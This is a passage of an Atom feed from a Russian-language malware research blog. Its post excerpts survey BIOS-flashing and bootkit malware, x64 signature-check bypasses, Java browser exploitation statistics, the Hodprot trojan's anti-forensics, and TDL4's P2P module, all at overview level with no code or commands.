width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-lnuJO8qpSDA/TnO0geXE1bI/AAAAAAAAA88/RC5YNI7szwM/s72-c/VB2011-slide-new.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1517097886186513513</id><published>2011-09-11T21:24:00.000+04:00</published><updated>2011-09-11T21:25:21.307+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='BIOS'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Win32/Wapomi модифицирует прошивку BIOS</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Началось все в начале сентября с опубликованного, китайской антивирусной компанией 360 Security, &lt;a href="http://bbs.360.cn/4005462/251096134.html"&gt;сообщения&lt;/a&gt; в блог о найденной вредоносной программе, которая осуществляет модификацию прошивки  BIOS. Это сообщение не особо было замечено общественностью, быть может, ввиду того, что было опубликовано на китайском или из-за небольшого количества читателей самого блога. Но на прошлой неделе появилось уже сразу две публикации на английском:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://blogs.norman.com/2011/malware-detection-team/mebromi-a-bios-flashing-trojan"&gt;Mebromi, a bios-flashing trojan&lt;/a&gt; (Norman)&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.symantec.com/connect/blogs/bios-threat-showing-again"&gt;BIOS threat is showing up again!&lt;/a&gt; (Symantec)&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;Первая мало информативна, т.к. автор в основном рассуждает о былых временах и концептах ушедших лет, разбавляя это не очень интересными картинками. А вот второй пост от Symantec более содержателен и описывает некоторые подробности работы.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/09/win32wapomi-bios.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1517097886186513513?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1517097886186513513/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/09/win32wapomi-bios.html#comment-form' title='Комментарии: 4'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1517097886186513513'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1517097886186513513'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/09/win32wapomi-bios.html' title='Win32/Wapomi модифицирует прошивку BIOS'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-3631074235180550249</id><published>2011-08-30T21:22:00.000+04:00</published><updated>2011-08-30T21:22:16.910+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FUN'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='CC'/><title type='text'>CC'11 впечатления</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;В выходные мне таки давилось побывать на Chaos Constructions&amp;#39;2011 и сразу хочу сказать, что мои опасения сбылись. В этом году фестиваль значительно уступал прошлогоднему мероприятию в плане ИБ составляющей, да и в принципе народу было меньше. Конечно, по анонсированной программе семинаров это все было итак понятно, я туда ехал скорее пообщаться с друзьями, нежели на сам фестиваль. Что касается HackQuest в этом году, то со слов организаторов, задания были упрощены, так как по опыту прошлых лет немногие с ними могли справится. Но вот удалось ли им достичь баланса между упрощением заданий и интересными квестами, сам судить я не могу, ибо не участвовал (крякми то не было никакого). Но слов некоторых участников, по сравнению с прошлом годом получилось хуже. Из позитивного в этом году был интересный &lt;a href="https://cc11.onsec.ru/"&gt;конкурс&lt;/a&gt; от ONsec и &lt;a href="https://twitter.com/#!/d0znpp"&gt;Владимира Воронцова&lt;/a&gt; по обходу WAF.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-zytSl6Wl2L4/Tl0Xg0DzddI/AAAAAAAAA8g/1XFTQ9REdPk/s1600/08260855.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://2.bp.blogspot.com/-zytSl6Wl2L4/Tl0Xg0DzddI/AAAAAAAAA8g/1XFTQ9REdPk/s320/08260855.JPG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/08/cc11.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-3631074235180550249?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/3631074235180550249/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/cc11.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3631074235180550249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3631074235180550249'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/cc11.html' title='CC&apos;11 впечатления'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-zytSl6Wl2L4/Tl0Xg0DzddI/AAAAAAAAA8g/1XFTQ9REdPk/s72-c/08260855.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-952058360781399367</id><published>2011-08-25T21:05:00.000+04:00</published><updated>2011-08-25T21:05:13.811+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='CC'/><title type='text'>Chaos Constructions'2011</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-LxhLqmIuUEc/TlZ3yUl0hLI/AAAAAAAAA8Y/OoGT2ychijY/s1600/banner_cc_300x600_rsa_static.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-LxhLqmIuUEc/TlZ3yUl0hLI/AAAAAAAAA8Y/OoGT2ychijY/s200/banner_cc_300x600_rsa_static.png" width="198" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Уже традиционно в последние выходные лета в Питере проходит&amp;nbsp;компьютерный&amp;nbsp;фестиваль&amp;nbsp;&lt;a href="http://party11.cc.org.ru/"&gt;Chaos Constructions&lt;/a&gt;. И так же уже традиционно на этом фестивале большая часть докладов и конкурсов посвящены тематике информационной безопасности. Для себя отметил несколько докладов, которые хочу&amp;nbsp;посетить:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;"Lockpicking - зачем это нужно ИТ специалистам?" - &lt;a href="https://twitter.com/#!/asintsov"&gt;Алексей Синцов&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;"Безопасность расширений веб-браузеров на примере Mozilla Firefox"- &lt;a href="http://oxdef.info/"&gt;Тарас Иващенко&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;"Безопасность браузеров. Атаки на пользовательский интерфейс" - &lt;a href="https://twitter.com/#!/d0znpp"&gt;Владимир Воронцов&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Так, что на этих докладах меня можно будет поймать в зале и пообщаться ;)&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-952058360781399367?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/952058360781399367/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/chaos-constructions2011.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/952058360781399367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/952058360781399367'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/chaos-constructions2011.html' title='Chaos Constructions&apos;2011'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-LxhLqmIuUEc/TlZ3yUl0hLI/AAAAAAAAA8Y/OoGT2ychijY/s72-c/banner_cc_300x600_rsa_static.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2603358978616735830</id><published>2011-08-24T16:30:00.000+04:00</published><updated>2011-08-25T12:33:37.304+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='VMware'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='MBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='System Internals'/><title type='text'>Техники обхода проверок цифровой подписи на x64</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Множится нынче количество угроз для 64-битных платформ с виндой, причем множатся не только различные троянцы, но и рукиты/буткиты в том числе. Причины очевидны, доля WinXP уверенно снижается, а предустановленных версий Win7(x64) становится все больше. В подтверждение этому факту вот такая интересная статистика за последний год:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-nmsrKjA0-cg/TlTIeZkJjcI/AAAAAAAAA7o/56zUq06J284/s1600/StatCounter-os-ww-monthly-201008-201108.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://1.bp.blogspot.com/-nmsrKjA0-cg/TlTIeZkJjcI/AAAAAAAAA7o/56zUq06J284/s320/StatCounter-os-ww-monthly-201008-201108.jpg" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Сейчас из наиболее интересных и активных угроз для x64 можно выделить следующие семейства: &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Win64/Olmarik (MBR bootkit) &lt;/li&gt;&lt;li&gt;Win64/Rovnix (VBR bootkit) &lt;/li&gt;&lt;li&gt;Win64/TrojanDownloader.Necurs &lt;/li&gt;&lt;li&gt;Win64/Spy.Banker &lt;/li&gt;&lt;/ul&gt;&lt;br&gt;&lt;div style="text-align: justify;"&gt;Используемые ими подходы можно разделить на две большие группы и представить графически в виде следующей схемы:&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-QHQZSZWJHiI/TlPJMRR0BOI/AAAAAAAAA6s/3ajytqTPTn4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="http://3.bp.blogspot.com/-QHQZSZWJHiI/TlPJMRR0BOI/AAAAAAAAA6s/3ajytqTPTn4/s320/2.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/08/x64.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2603358978616735830?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2603358978616735830/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/x64.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2603358978616735830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2603358978616735830'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/x64.html' title='Техники обхода проверок цифровой подписи на x64'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-nmsrKjA0-cg/TlTIeZkJjcI/AAAAAAAAA7o/56zUq06J284/s72-c/StatCounter-os-ww-monthly-201008-201108.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8331867100836620293</id><published>2011-08-12T18:02:00.003+04:00</published><updated>2011-08-15T13:02:43.597+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ASLR'/><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='DEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Насколько защищены современные браузеры?</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Недавно мне попалась на глаза интересный доклад от Dino Dai Zovi "&lt;a href="http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf"&gt;Attacker “Math” 101&lt;/a&gt;", в которой нашлись очень здравые схемы демонстрирующие ответ на этот вопрос. По нашей статистике, что я уже не однократно &lt;a href="http://amatrosov.blogspot.com/2011/02/java.html"&gt;отмечал&lt;/a&gt;, беспрецедентное лидерство про проникновению имеют java эксплойты. А ответ почему, как раз наглядно проиллюстрирован на следующей схеме:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-LYnEMAJnMEc/TkUmzW4iJhI/AAAAAAAAA5w/l7iaqovfo5s/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://3.bp.blogspot.com/-LYnEMAJnMEc/TkUmzW4iJhI/AAAAAAAAA5w/l7iaqovfo5s/s320/2.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Собственно, что из этого следует, основная мысль в том, что реализация java платформы по прежнему не использует механизмы противодействия эксплуатации и является слабым звеном, не смотря на все новомодные "песочницы" и прочий стаф. Если из этой цепочки исключить java, то все становится значительно сложнее для злоумышленников:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-RCPMIauGyx0/TkUrL84nijI/AAAAAAAAA54/b5H2ZmeAdCo/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="146" src="http://2.bp.blogspot.com/-RCPMIauGyx0/TkUrL84nijI/AAAAAAAAA54/b5H2ZmeAdCo/s320/4.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;А вот, что бывает после обхода "песочницы":&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-J6i6gVWEb30/TkUyT6d9h6I/AAAAAAAAA6A/gunlFBiuJpE/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="186" src="http://4.bp.blogspot.com/-J6i6gVWEb30/TkUyT6d9h6I/AAAAAAAAA6A/gunlFBiuJpE/s320/3.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Проверить насколько актуальна ваша версия Java-плагина можно, к примеру, при помощи сервиса &lt;a href="http://www.surfpatrol.ru/"&gt;SurfPatrol &lt;/a&gt;от PT.&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8331867100836620293?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8331867100836620293/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/blog-post_12.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8331867100836620293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8331867100836620293'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/blog-post_12.html' title='Насколько защищены современные браузеры?'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-LYnEMAJnMEc/TkUmzW4iJhI/AAAAAAAAA5w/l7iaqovfo5s/s72-c/2.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5102354396390390361</id><published>2011-08-04T19:03:00.001+04:00</published><updated>2011-08-04T19:04:08.495+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Antiforensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Antivirus'/><title type='text'>Противодействие криминалистической экспертизе со стороны вредоносных программ</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Вчера мы выпустили исследовательский &lt;a href="http://www.eset.com/us/resources/white-papers/Hodprot-Report.pdf"&gt;отчет&lt;/a&gt; об одном интересном троянце Win32/Hodprot. Интересен он тем, что использует довольно хитрые механизмы противодействия своему обнаружению в системе. Итак, давайте обо всем по порядку ;) &lt;br&gt;&lt;br&gt;Процесс заражения системы можно описать следующей схемой:&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-T462CjDKcBk/Tjqq_SN4tdI/AAAAAAAAA48/dkQkawJ47D8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-T462CjDKcBk/Tjqq_SN4tdI/AAAAAAAAA48/dkQkawJ47D8/s320/3.png" width="285"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/08/blog-post.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5102354396390390361?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5102354396390390361/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/blog-post.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5102354396390390361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5102354396390390361'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/blog-post.html' title='Противодействие криминалистической экспертизе со стороны вредоносных программ'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-T462CjDKcBk/Tjqq_SN4tdI/AAAAAAAAA48/dkQkawJ47D8/s72-c/3.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1884796984541400429</id><published>2011-08-02T19:41:00.001+04:00</published><updated>2011-08-02T19:45:19.722+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Decompilation'/><category scheme='http://www.blogger.com/atom/ns#' term='REcon'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Hex-Rays'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>Practical C++ decompilation</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;object height="338" width="450"&gt;&lt;param name="video" value="http://static.video.yandex.ru/lite/matros0ff/fyoqvavljl.3010/"/&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="scale" value="noscale"/&gt;&lt;embed src="http://static.video.yandex.ru/lite/matros0ff/fyoqvavljl.3010/" type="application/x-shockwave-flash" width="450" height="338" allowFullScreen="true" scale="noscale"&gt; &lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf"&gt;слайды презентации&lt;/a&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1884796984541400429?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1884796984541400429/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/08/practical-c-decompilation.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1884796984541400429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1884796984541400429'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/08/practical-c-decompilation.html' title='Practical C++ decompilation'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1198908403039555198</id><published>2011-07-04T21:36:00.002+04:00</published><updated>2011-07-06T14:08:56.742+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='TDL4'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Kad.dll или P2P протокол для ботнета TDL4</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Kad.dll (MD5: d532084641791ff3db1fbf885120e6e6 &lt;a href="http://www.virustotal.com/file-scan/report.html?id=731751003a8ba51d8af6c89d86163e5c50b6d556f2ffe6550b409eb821dfc736-1309797793"&gt;VT&lt;/a&gt;) это название нового пейлоада для зараженных машин руткитом TDL4, который был предназначен для инжекта в пользовательские процессы (что то вроде cmd32.dll/cmd64), в текущей версии поддерживаются только x86 системы. Появился этот компонент еще в начале года и до сих пор распространяется с кучей отладочных проверок, что наводит на мысли о его маленькой распространенности (подтверждено нашей статистикой) и видимо пока тестировании на небольших группах уже зараженных пользователей.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Библиотека kad.dll базируется на протоколе &lt;a href="http://ru.wikipedia.org/wiki/Kademlia"&gt;Kademilia&lt;/a&gt; для построения P2P. В основе этого протокола лежит распределенная таблица хешей, посредством которой создается новая абстрактная сеть в рамках которой взаимодействуют зараженные узлы. В отличие от архитектуры клиент-сервер (админка-бот), в рамках P2P сети каждый узел может выступать и в роли бота, и роли админки одновременно.&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-PAj2ZI3mNE8/ThHzAt_TixI/AAAAAAAAA3s/z80DaG396dU/s1600/p2p.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="174" src="http://1.bp.blogspot.com/-PAj2ZI3mNE8/ThHzAt_TixI/AAAAAAAAA3s/z80DaG396dU/s320/p2p.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/07/kaddll-p2p-tdl4.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1198908403039555198?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1198908403039555198/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/07/kaddll-p2p-tdl4.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1198908403039555198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1198908403039555198'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/07/kaddll-p2p-tdl4.html' title='Kad.dll или P2P протокол для ботнета TDL4'/><author><name>Aleks 